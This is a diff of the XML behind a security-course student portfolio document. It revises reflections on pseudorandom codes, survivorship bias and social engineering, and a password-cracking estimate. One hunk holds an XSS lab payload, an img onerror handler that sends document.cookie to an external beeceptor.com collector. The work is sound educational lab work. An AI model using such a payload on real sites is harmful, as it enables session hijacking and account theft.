     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -192,6 +192,7 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:highlight w:val="green"/>
           </w:rPr>
           <w:t>Security Everywhere</w:t>
         </w:r>
@@ -216,35 +217,198 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week. It discusses pseudorandom code generation, which is fundamental to many secure communication systems. These codes are designed to have high entropy and low correlation, making signals difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness and unpredictability are essential for maintaining security.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>The article also explains how physical effects, such as Doppler shift, can introduce correlation into transmitted codes. This highlights that security is influenced not only by the code itself but also by the physical environment in which it operates. As a result, designers must consider randomness in areas such as frequency selection and hopping patterns, in addition to the code sequence.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Another interesting point was that some algorithms only guarantee desirable security properties for fixed code lengths rather than variable-length systems. This reflects a common challenge in security engineering, where the effectiveness of a technique often depends on the assumptions under which it was designed. Overall, the article provided a useful example of how concepts such as entropy, unpredictability, and resistance to attack apply not only to cryptography but also to communication system design.</w:t>
+              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week while also highlighting an important security risk. The article discusses pseudorandom code generation, where signals are designed to have high entropy and low correlation so they are difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness is essential for maintaining security.</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>Link:</w:t>
+              <w:t>What stood out to me was that the article explains how physical effects such as Doppler shift can introduce correlation into transmitted codes. This creates a security risk because a system that appears secure in theory may become more predictable when deployed in a real environment. The article also notes that some algorithms only guarantee desirable security properties for fixed code lengths, meaning their effectiveness depends on assumptions that may not always hold in practice.</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">This reminded me that risk in security is not limited to weaknesses in algorithms. </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Real world </w:t>
+            </w:r>
+            <w:r>
+              <w:t>factors such as environmental conditions, implementation details, and incorrect assumptions can reduce the security of a system even when the underlying design is mathematically sound. It also affects the resources required by an attacker, as detecting and exploiting small correlations may require increasingly advanced receivers, signal processing techniques, and computational power. As a result, security often depends not only on whether a system can be broken, but also on the practical difficulty and cost of doing so.</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5063100A" wp14:editId="60605C02">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>2929890</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>0</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="2744470" cy="2129155"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="202431067" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 1"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId9" cstate="print">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2744470" cy="2129155"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln>
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                  <wp14:sizeRelH relativeFrom="margin">
+                    <wp14:pctWidth>0</wp14:pctWidth>
+                  </wp14:sizeRelH>
+                  <wp14:sizeRelV relativeFrom="margin">
+                    <wp14:pctHeight>0</wp14:pctHeight>
+                  </wp14:sizeRelV>
+                </wp:anchor>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FFAB3B7" wp14:editId="2D8BDB49">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>1905</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>3810</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="2912110" cy="1921510"/>
+                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="1663794505" name="Picture 2" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsoft"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 3" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsoft"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId10">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2912110" cy="1921510"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln>
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                  <wp14:sizeRelH relativeFrom="margin">
+                    <wp14:pctWidth>0</wp14:pctWidth>
+                  </wp14:sizeRelH>
+                  <wp14:sizeRelV relativeFrom="margin">
+                    <wp14:pctHeight>0</wp14:pctHeight>
+                  </wp14:sizeRelV>
+                </wp:anchor>
+              </w:drawing>
             </w:r>
           </w:p>
           <w:p>
-            <w:hyperlink r:id="rId9" w:history="1">
+            <w:r>
+              <w:t>Left: Example of a QAM coding scheme waveform from [1] Right : System diagram of how coding works from [2]</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Link:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:hyperlink r:id="rId11" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
+                  <w:i/>
+                  <w:iCs/>
                 </w:rPr>
                 <w:t>https://insidegnss.com/codes-the-prn-family-grows-again/</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
@@ -270,40 +434,25 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
       </w:pPr>
-      <w:commentRangeStart w:id="0"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Humans, Measuring</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:commentReference w:id="0"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId14">
+      <w:hyperlink r:id="rId12">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:highlight w:val="green"/>
           </w:rPr>
           <w:t>Research a Cognitive Vulnerability</w:t>
         </w:r>
@@ -348,7 +497,7 @@
             <w:r>
               <w:t xml:space="preserve">Link: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId15" w:history="1">
+            <w:hyperlink r:id="rId13" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -374,14 +523,219 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="482BF733" wp14:editId="79767977">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>-2307</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>72</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="4027990" cy="3219241"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="606947453" name="Picture 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 2"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId14">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4027990" cy="3219241"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:anchor>
+              </w:drawing>
             </w:r>
           </w:p>
           <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <mc:AlternateContent>
+                <mc:Choice Requires="wps">
+                  <w:drawing>
+                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203E0B2A" wp14:editId="5EF43399">
+                      <wp:simplePos x="0" y="0"/>
+                      <wp:positionH relativeFrom="column">
+                        <wp:posOffset>167005</wp:posOffset>
+                      </wp:positionH>
+                      <wp:positionV relativeFrom="paragraph">
+                        <wp:posOffset>2863850</wp:posOffset>
+                      </wp:positionV>
+                      <wp:extent cx="3858895" cy="541020"/>
+                      <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+                      <wp:wrapSquare wrapText="bothSides"/>
+                      <wp:docPr id="1574389247" name="Text Box 1"/>
+                      <wp:cNvGraphicFramePr/>
+                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                          <wps:wsp>
+                            <wps:cNvSpPr txBox="1"/>
+                            <wps:spPr>
+                              <a:xfrm>
+                                <a:off x="0" y="0"/>
+                                <a:ext cx="3858895" cy="541020"/>
+                              </a:xfrm>
+                              <a:prstGeom prst="rect">
+                                <a:avLst/>
+                              </a:prstGeom>
+                              <a:solidFill>
+                                <a:prstClr val="white"/>
+                              </a:solidFill>
+                              <a:ln>
+                                <a:noFill/>
+                              </a:ln>
+                            </wps:spPr>
+                            <wps:txbx>
+                              <w:txbxContent>
+                                <w:p>
+                                  <w:pPr>
+                                    <w:pStyle w:val="Caption"/>
+                                    <w:rPr>
+                                      <w:noProof/>
+                                    </w:rPr>
+                                  </w:pPr>
+                                  <w:r>
+                                    <w:t xml:space="preserve">Figure </w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="begin"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="separate"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:rPr>
+                                      <w:noProof/>
+                                    </w:rPr>
+                                    <w:t>1</w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="end"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:t xml:space="preserve"> Survivorship Bias </w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:t>during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
+                                  </w:r>
+                                </w:p>
+                              </w:txbxContent>
+                            </wps:txbx>
+                            <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                              <a:prstTxWarp prst="textNoShape">
+                                <a:avLst/>
+                              </a:prstTxWarp>
+                              <a:noAutofit/>
+                            </wps:bodyPr>
+                          </wps:wsp>
+                        </a:graphicData>
+                      </a:graphic>
+                      <wp14:sizeRelH relativeFrom="margin">
+                        <wp14:pctWidth>0</wp14:pctWidth>
+                      </wp14:sizeRelH>
+                      <wp14:sizeRelV relativeFrom="margin">
+                        <wp14:pctHeight>0</wp14:pctHeight>
+                      </wp14:sizeRelV>
+                    </wp:anchor>
+                  </w:drawing>
+                </mc:Choice>
+                <mc:Fallback>
+                  <w:pict>
+                    <v:shapetype w14:anchorId="203E0B2A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                      <v:stroke joinstyle="miter"/>
+                      <v:path gradientshapeok="t" o:connecttype="rect"/>
+                    </v:shapetype>
+                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:13.15pt;margin-top:225.5pt;width:303.85pt;height:42.6pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                      <v:textbox inset="0,0,0,0">
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:t>1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> Survivorship Bias </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </v:textbox>
+                      <w10:wrap type="square"/>
+                    </v:shape>
+                  </w:pict>
+                </mc:Fallback>
+              </mc:AlternateContent>
+            </w:r>
+            <w:r>
+              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -410,7 +764,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId16">
+      <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -501,7 +855,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId17">
+      <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -528,7 +882,7 @@
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:commentRangeStart w:id="1"/>
+            <w:commentRangeStart w:id="0"/>
           </w:p>
           <w:tbl>
             <w:tblPr>
@@ -1535,7 +1889,6 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:lastRenderedPageBreak/>
                     <w:t>Large Organisation</w:t>
                   </w:r>
                 </w:p>
@@ -1666,6 +2019,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
+                    <w:lastRenderedPageBreak/>
                     <w:t>I</w:t>
                   </w:r>
                   <w:r>
@@ -1706,6 +2060,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
+                    <w:lastRenderedPageBreak/>
                     <w:t> </w:t>
                   </w:r>
                   <w:r>
@@ -2666,7 +3021,7 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:hyperlink r:id="rId18" w:anchor="date" w:history="1">
+            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2707,7 +3062,7 @@
             <w:r>
               <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId19" w:anchor="cpu-commonality" w:history="1">
+            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2768,7 +3123,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>I am assuming that this person will spend approximately 75%</w:t>
             </w:r>
             <w:r>
@@ -2804,6 +3158,7 @@
               </w:rPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
@@ -3239,14 +3594,14 @@
                 <m:t xml:space="preserve">bits/day </m:t>
               </m:r>
             </m:oMath>
-            <w:commentRangeEnd w:id="1"/>
+            <w:commentRangeEnd w:id="0"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="CommentReference"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:commentReference w:id="1"/>
+              <w:commentReference w:id="0"/>
             </w:r>
           </w:p>
           <w:p>
@@ -3440,7 +3795,6 @@
                 <w:color w:val="333333"/>
                 <w:lang w:eastAsia="en-AU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
             </w:r>
             <w:r>
@@ -3643,7 +3997,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20">
+      <w:hyperlink r:id="rId23">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3735,7 +4089,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId21"/>
+                          <a:blip r:embed="rId24"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3761,7 +4115,6 @@
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                   <wp:extent cx="5498327" cy="2753275"/>
@@ -3778,7 +4131,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId25"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3839,6 +4192,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
             </w:r>
           </w:p>
@@ -3868,15 +4222,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>decodeURIComponent(document.cookie)})"&gt;</w:t>
+              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3898,7 +4244,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId26"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3940,7 +4286,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId24"/>
+                          <a:blip r:embed="rId27"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -4005,7 +4351,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId25">
+      <w:hyperlink r:id="rId28">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4064,7 +4410,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>We first discussed the risk of entrusting the passcode to Bess, since her personal connection made her vulnerable to social engineering. I agreed the secret should move to another mechanism, as any single person becomes a weak target that many mediums could pressure or exploit.</w:t>
             </w:r>
           </w:p>
@@ -4222,6 +4567,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Wrap up</w:t>
       </w:r>
     </w:p>
@@ -4238,9 +4584,25 @@
         <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[1] Institute of Telecommunications, University of Stuttgart, “Channel Coding Web Demonstration,” University of Stuttgart. [Online]. Available: https://webdemo.inue.uni-stuttgart.de/webdemos/03_theses/chCoding/index.php?id=1. [Accessed: Jun. 22, 2026].</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>[2] Rahsoft, “Understanding Quadrature Amplitude Modulation (QAM) and Its Applications,” Feb. 28, 2025. [Online]. Available: https://rahsoft.com/2025/02/28/understanding-quadrature-amplitude-modulation-qam-and-its-applications/. [Accessed: Jun. 22, 2026].</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId26"/>
-      <w:footerReference w:type="default" r:id="rId27"/>
+      <w:headerReference w:type="default" r:id="rId29"/>
+      <w:footerReference w:type="default" r:id="rId30"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -4252,23 +4614,7 @@
 
 <file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
